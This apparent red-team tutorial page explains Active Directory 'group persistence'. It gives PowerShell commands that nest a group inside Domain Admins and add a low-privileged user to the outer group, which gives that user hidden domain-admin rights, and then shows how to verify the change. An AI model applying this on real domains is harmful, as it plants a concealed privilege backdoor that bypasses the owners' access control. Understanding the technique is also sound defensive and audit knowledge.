Skip to main content

Group Persistence

Required Privileges: Administrators
SCENARIO

We have the IT Group which has Two Nested Groups in the Internet Access Group named NestGroup-1 - NestGroup-2.


Let's add NestGroup-2 Group to the Domain Admins Group.

Add-ADGroupMember -Identity "Domain Admins" -Members "NestGroup-2"

Add our Low-Privileged AD User to the first Group NestGroup-1.

Add-ADGroupMember -Identity "NestGroup-1" -Members "<Low Privileged AD Username>"

Verifying the Access

Our Low-Privileged User should now have Updated Privileged Access on the Domain. We can verify that our user is now Part of the New Groups with the following Command.

:: Displays the User Groups to which the Current User Belongs
whoami /groups

We can Verify the New Members in the Domain Admins Group with this Command.

Get-ADGroupMember -Identity "Domain Admins"